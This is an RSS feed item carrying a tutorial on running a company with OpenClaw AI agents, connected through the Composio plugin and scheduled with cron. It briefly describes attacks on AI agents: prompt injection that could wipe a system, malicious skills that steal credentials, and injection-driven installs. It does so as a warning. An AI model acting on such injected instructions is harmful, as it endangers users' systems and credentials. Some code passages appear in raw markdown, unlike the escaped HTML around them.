<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Shrijal Acharya</title>
    <description>The latest articles on Forem by Shrijal Acharya (@shricodev).</description>
    <link>https://forem.com/shricodev</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg</url>
      <title>Forem: Shrijal Acharya</title>
      <link>https://forem.com/shricodev</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/shricodev"/>
    <language>en</language>
    <item>
      <title>🚀 How to run a fully-autonomous company with OpenClaw 🦞</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 02 Apr 2026 14:39:22 +0000</pubDate>
      <link>https://forem.com/composiodev/how-to-run-a-fully-autonomous-company-with-openclaw-ma5</link>
      <guid>https://forem.com/composiodev/how-to-run-a-fully-autonomous-company-with-openclaw-ma5</guid>
      <description>&lt;p&gt;Imagine owning a company with just one human employee, and that too is yourself. The rest? All OpenClaw agents!&lt;/p&gt;

&lt;p&gt;Before OpenClaw, that would have sounded completely silly, but with it, it's possible, &lt;strong&gt;really possible!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can automate your entire company or simulate a fully functioning one with just OpenClaw and your VPS, Mac Mini, or local system for testing.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fety6wnq6m91tsqhv27gi.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fety6wnq6m91tsqhv27gi.jpg" alt="obama meme" width="640" height="391"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;In this tutorial, you'll learn how to run an entire company using just yourself and a bunch of &lt;strong&gt;OpenClaw agents&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you will learn: ✨&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What OpenClaw is and how it works&lt;/li&gt;
&lt;li&gt;Why storing API keys locally is a bad idea&lt;/li&gt;
&lt;li&gt;Setting up &lt;strong&gt;Composio&lt;/strong&gt; for secure OAuth-based integrations&lt;/li&gt;
&lt;li&gt;Connecting your first app and getting agents up and running 🚀&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ready to become a one-person company? 👀&lt;/p&gt;




&lt;h2&gt;
  
  
  What's OpenClaw?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqljwq3cff8femj5e1s0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqljwq3cff8femj5e1s0.png" alt="OpenClaw Banner" width="800" height="259"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 I assume you already know what OpenClaw is. If not, why are you even here? Just kidding... The blog itself is completely beginner-friendly. If you already have an idea of what OpenClaw is, just skip this section.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;OpenClaw is a personal AI assistant you run on your own machine or a server you own. It sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations, and that's exactly what makes the one-person company possible.&lt;/p&gt;

&lt;p&gt;Take this as a mental model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your LLM is the brain (thinks)&lt;/li&gt;
&lt;li&gt;OpenClaw is the body (it can do things)&lt;/li&gt;
&lt;li&gt;The Gateway is the receptionist (routes messages in and results out)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It provides the model with a runtime that can call tools, maintain state, and appear where you already chat (WhatsApp, Telegram, Slack, Discord, etc.). Now, that's just the gist. There's much more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosrayie6pppe2qbj6kan.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosrayie6pppe2qbj6kan.jpg" alt="OpenClaw architecture" width="800" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For installation, visit the OpenClaw &lt;a href="https://docs.openclaw.ai/install" rel="noopener noreferrer"&gt;installation guide&lt;/a&gt;, and based on your distro and installation choice, install it on your machine.&lt;/p&gt;

&lt;p&gt;If you just want it running quickly, do the normal installation. If you're even slightly paranoid (which you should be 😮‍💨), use Docker.&lt;/p&gt;

&lt;p&gt;Also, make sure you set up a channel for easier chatting from your phone (preferably Telegram).&lt;/p&gt;

&lt;p&gt;For help setting up a channel, ask OpenClaw itself. It knows itself better than anyone else on the internet.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 If you face issues like &lt;code&gt;OpenClaw: access not configured&lt;/code&gt; when talking with the bot, make sure you run this command:&lt;/p&gt;


&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw pairing approve &amp;lt;telegram/whatsapp/...&amp;gt; &amp;lt;pairing_code&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Just like that, now you have an agent listening on your channel. Message anything, and you should get a reply back.&lt;/p&gt;

&lt;p&gt;From here onwards, I assume you already have OpenClaw running. To make sure everything is working, run this command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw health
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;If not, try running &lt;code&gt;openclaw doctor&lt;/code&gt;, which helps debug your gateway or channel issues.&lt;/p&gt;
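If you want a single check that falls back to diagnostics automatically, you can chain the two commands above (just a convenience sketch using only the commands already shown):

```shell
# If the health check fails, immediately run the diagnostic tool.
openclaw health || openclaw doctor
```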


&lt;h2&gt;
  
  
  Run a whole company?
&lt;/h2&gt;

&lt;p&gt;Yeah, in theory, you can actually automate or run an entire company. I can't guarantee the company will last long, but with OpenClaw, it's now possible.&lt;/p&gt;

&lt;p&gt;The only human in the process is going to be yourself. All your employees will be &lt;strong&gt;OpenClaw Agents&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3j5c227mzou0xz0n0j38.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3j5c227mzou0xz0n0j38.png" alt="Openclaw running an entire company architecture" width="800" height="600"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, most day-to-day operations of running a company, such as sales, team meetings, and customer care, can be managed with OpenClaw Agents. And there are many more than just the ones in the image, of course. This is just a quick sketch to give you an idea.&lt;/p&gt;


&lt;h2&gt;
  
  
  Problem with "Just OpenClaw"
&lt;/h2&gt;

&lt;p&gt;By default, OpenClaw works with API keys, and it stores them in a plain text file in the &lt;code&gt;~/.openclaw/&lt;/code&gt; directory for all the services you use, such as Google, Gmail, and so on. That's especially risky on your everyday local machine, and even on a dedicated VPS or the hyped &lt;strong&gt;Mac Mini&lt;/strong&gt;, storing credentials in a plain text file is never a good idea.&lt;/p&gt;
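Until you move off local keys entirely, at minimum make sure that directory isn't readable by other users. Here's a small, self-contained sketch of the idea, run against a throwaway `/tmp` path rather than your real `~/.openclaw/`:

```shell
# Demo on a throwaway directory (NOT your real ~/.openclaw/):
# restrict a secrets directory and file to the owning user only.
mkdir -p /tmp/openclaw-perms-demo
echo "FAKE_KEY=not-a-real-key" > /tmp/openclaw-perms-demo/credentials

chmod 700 /tmp/openclaw-perms-demo              # owner-only access to the directory
chmod 600 /tmp/openclaw-perms-demo/credentials  # owner-only read/write on the file

ls -l /tmp/openclaw-perms-demo/credentials
```

This doesn't solve the underlying problem (the keys are still plain text on disk); it only narrows who can read them.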

&lt;p&gt;Smaller models in particular are even more prone to prompt injection, and since OpenClaw has full system access, a single injected instruction could wipe out your entire system without you doing anything.&lt;/p&gt;

&lt;p&gt;What's actually gone wrong in the wild (already):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Malicious skills on ClawHub:&lt;/strong&gt; researchers found hundreds to thousands of skills that were straight-up malware or had critical issues, including credential theft and prompt injection patterns.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection turning into installs:&lt;/strong&gt; there's been at least one high-profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo215wy0xag7t8z86ogzv.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo215wy0xag7t8z86ogzv.jpg" alt="OpenClaw compromised" width="800" height="379"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For the above reasons, I recommend using a hosted integration service, which in my case is &lt;strong&gt;Composio&lt;/strong&gt;. It lets you authenticate using OAuth, which is far more secure than pasting API keys locally.&lt;/p&gt;


&lt;h2&gt;
  
  
  Connecting your first app
&lt;/h2&gt;

&lt;p&gt;Now, it's time to create agents, but first, we need to set up or connect our first app from Composio.&lt;/p&gt;

&lt;p&gt;The agents will mostly revolve around working with those applications from Composio.&lt;/p&gt;
&lt;h3&gt;
  
  
  1. Install Composio Plugin
&lt;/h3&gt;

&lt;p&gt;Composio's OpenClaw plugin connects OpenClaw to Composio's MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins &lt;span class="nb"&gt;install&lt;/span&gt; @composio/openclaw-plugin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  2. Composio Plugin Setup
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Log in at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Choose OpenClaw as the client.&lt;/li&gt;
&lt;li&gt;Copy your consumer key (&lt;code&gt;ck_...&lt;/code&gt;) from the Composio dashboard settings, then set it:&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F982ctfxsvbsd8d1dsmmk.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F982ctfxsvbsd8d1dsmmk.jpg" alt="Composio OpenClaw setup instructions" width="800" height="213"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw config &lt;span class="nb"&gt;set &lt;/span&gt;plugins.entries.composio.config.consumerKey &lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Now, it's a good idea to restart the gateway:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw gateway restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  3. Verify the plugin loaded
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins list
openclaw logs &lt;span class="nt"&gt;--follow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You're looking for something like "Composio loaded" and a "tools registered" message.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce73szhae07paumt96ae.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce73szhae07paumt96ae.jpg" alt="OpenClaw successfully loads Composio" width="800" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the plugin is &lt;strong&gt;"loaded"&lt;/strong&gt;, it means you can now successfully access Composio.&lt;/p&gt;

&lt;p&gt;Here's how it works:&lt;/p&gt;

&lt;p&gt;The plugin connects to Composio's MCP server at &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt; and registers all available tools directly into the OpenClaw agent. Tools are called by name — no extra search or execute steps needed.&lt;/p&gt;

&lt;p&gt;If a tool returns an auth error, the agent will prompt you to connect that toolkit at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's how the configuration looks:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"plugins"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"entries"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"consumerKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You can configure the following options directly from the config file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;enabled&lt;/code&gt;: enable or disable the plugin&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;consumerKey&lt;/code&gt;: your Composio consumer key&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;mcpUrl&lt;/code&gt;: the MCP server URL. By default, it's &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
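Since `consumerKey` was set with `openclaw config set` earlier, the other options can presumably be changed the same way. For example, overriding `mcpUrl` (I'm inferring the key path from the JSON above, so double-check it against your own config file):

```shell
# Point the plugin at a different MCP endpoint (defaults to Composio's hosted one).
openclaw config set plugins.entries.composio.config.mcpUrl "https://connect.composio.dev/mcp"
openclaw gateway restart   # restart so the gateway picks up the change
```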

&lt;p&gt;Previously, you had to configure API keys per integration, but with Composio you don't have to worry about any of that. Just make sure &lt;strong&gt;not to leak&lt;/strong&gt; the consumer key that we generated.&lt;/p&gt;

&lt;p&gt;And it's that simple. Everything works out of the box just as you would use any other OpenClaw plugin!&lt;/p&gt;

&lt;p&gt;Now, to test if it works, head over to the Control UI chat and send a message, something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"List the Composio tools you have available."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryuiqg0zcs7udhjqn44a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryuiqg0zcs7udhjqn44a.png" alt="OpenClaw listing composio tools" width="800" height="358"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it asks you to connect the tools, head over to &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt; and connect each of the tools you require. It's as simple as clicking &lt;strong&gt;Connect&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fecgu1xvvw1qzz27q5ymt.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fecgu1xvvw1qzz27q5ymt.jpg" alt="Adding integrations in Composio" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All the integrations you use are OAuth-hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.&lt;/p&gt;


&lt;h2&gt;
  
  
  Setting up a Multi-Agent Team
&lt;/h2&gt;

&lt;p&gt;The idea is pretty clear. Since one single agent wouldn't be enough to handle all sorts of company requirements due to &lt;strong&gt;context window limitations&lt;/strong&gt;, you could have multiple sub-agents for multiple task types.&lt;/p&gt;

&lt;p&gt;Say AgentA handles marketing, AgentB handles business analysis, and AgentC handles something else.&lt;/p&gt;

&lt;p&gt;Each agent has a distinct role, personality, and model optimized for its use case — say, for business analysis, you'd want a more research-oriented model like GPT-5.2.&lt;/p&gt;

&lt;p&gt;And how do you create them? It's simple, just chat with OpenClaw itself, either in the chat window or your configured channel.&lt;/p&gt;

&lt;p&gt;Example:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Please create a new agent called **Shri**. This agent should be capable of handling tasks such as reading and composing emails, and scheduling Google Meet sessions.

For the model, use **Claude Sonnet 4.6** (`claude-sonnet-4-6`).

Please ensure that the existing main agent remains untouched and unchanged.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd5r5jl6vv59m9a9tv8tb.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd5r5jl6vv59m9a9tv8tb.jpg" alt="Prompt in OpenClaw" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And it will create a new agent, which you can view in the &lt;code&gt;Agents&lt;/code&gt; tab in the OpenClaw dashboard or by running &lt;code&gt;/agents&lt;/code&gt; in the OpenClaw TUI.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbr7ukxn72n1y7fyejgu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbr7ukxn72n1y7fyejgu.png" alt="OpenClaw agents" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Do the same for all your different work types: create a separate agent for each kind of work.&lt;/p&gt;

&lt;p&gt;The main agent can then delegate work to those specialized agents, each handling one specific task type, which improves response quality because one agent is handling one type of work instead of everything at once.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;TIP:&lt;/strong&gt; This also helps you reduce model usage costs, as you can assign more reasoning-heavy models to complex tasks and smaller, cheaper models to simpler ones.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  What's Missing?
&lt;/h2&gt;

&lt;p&gt;Everything seems good, but there's one thing missing... &lt;strong&gt;autonomy&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;You still have to message OpenClaw manually to get things done, which isn't ideal when you're planning on using it as an AI employee.&lt;/p&gt;

&lt;p&gt;There are two ways to achieve this:&lt;/p&gt;
&lt;h3&gt;
  
  
  1. If you're a little technical
&lt;/h3&gt;

&lt;p&gt;If you're familiar with cron jobs and their syntax, this is a way to do it directly from the CLI, outside of OpenClaw.&lt;/p&gt;

&lt;p&gt;Run the following command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw cron add &lt;span class="nt"&gt;--schedule&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;cron_syntax&amp;gt;"&lt;/span&gt; &lt;span class="nt"&gt;--message&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;prompt&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Say you want it running every single day at 9 AM:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw cron add &lt;span class="nt"&gt;--schedule&lt;/span&gt; &lt;span class="s2"&gt;"0 9 * * *"&lt;/span&gt; &lt;span class="nt"&gt;--message&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;prompt&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
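The schedule string is standard five-field cron syntax (minute, hour, day of month, month, day of week). A couple more examples using the same command shape; the prompts are placeholders, so swap in your own:

```shell
# Every 2 hours, on the hour:
openclaw cron add --schedule "0 */2 * * *" --message "Check the support inbox and summarize new tickets"

# Weekdays (Mon-Fri) at 5:30 PM:
openclaw cron add --schedule "30 17 * * 1-5" --message "Draft an end-of-day status update"
```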

&lt;h3&gt;
  
  
  2. If you're not technical
&lt;/h3&gt;

&lt;p&gt;Similar to how we used a prompt to create a new agent, all you need to do is write a prompt:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Every morning at 9 AM, send me the top news of the day. Also scan my Google Calendar for the day, identify each attendee and their company. Send me two different messages on Telegram: one with the news summary and one with the meeting details.

Use the relevant Agent you have for each purpose.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;blockquote&gt;
&lt;p&gt;💁 There's also a similar concept called Heartbeat, which is another approach for scheduling tasks in OpenClaw. You can check it out here: &lt;a href="https://docs.openclaw.ai/gateway/heartbeat" rel="noopener noreferrer"&gt;OpenClaw Heartbeat&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  Workflow Demo
&lt;/h2&gt;

&lt;p&gt;Okay, time for a demo.&lt;/p&gt;

&lt;p&gt;Showing an entire workflow demo of running a company would be too much work, so for this demo, I will show you one part of the workflow: checking the calendar and messaging a summary with attendees every day at a set time.&lt;/p&gt;

&lt;p&gt;You could have it run every X hours or every day at a fixed time, and at each interval, the model carries out the steps above. (Obviously, this workflow is naive; it's just for the demo.) The possibilities are endless.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Keep this in mind: “anything that you can do manually on the internet, you can automate with OpenClaw.” So, you get the idea.&lt;/p&gt;

&lt;p&gt;💁 &lt;strong&gt;NOTE:&lt;/strong&gt; If you're serious about this idea, it's better to run this on a VPS or a Mac Mini, because your personal PC probably isn't running 24/7.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/3WZ5PkqyCyc"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So far, you've learned how to run a fully functioning company with just yourself and a bunch of &lt;strong&gt;OpenClaw agents&lt;/strong&gt;, using &lt;strong&gt;Composio&lt;/strong&gt; as the secure integration layer between OpenClaw and all your third-party apps.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Be sure to give a star to &lt;a href="https://github.com/ComposioHQ/composio" rel="noopener noreferrer"&gt;&lt;strong&gt;Composio&lt;/strong&gt;&lt;/a&gt; and &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt;&lt;/a&gt; on their GitHub repositories.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If you found this article helpful, drop a like and share your thoughts in the comments below. 👇&lt;/p&gt;

&lt;p&gt;Happy automating! 🥳&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=150,height=150,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
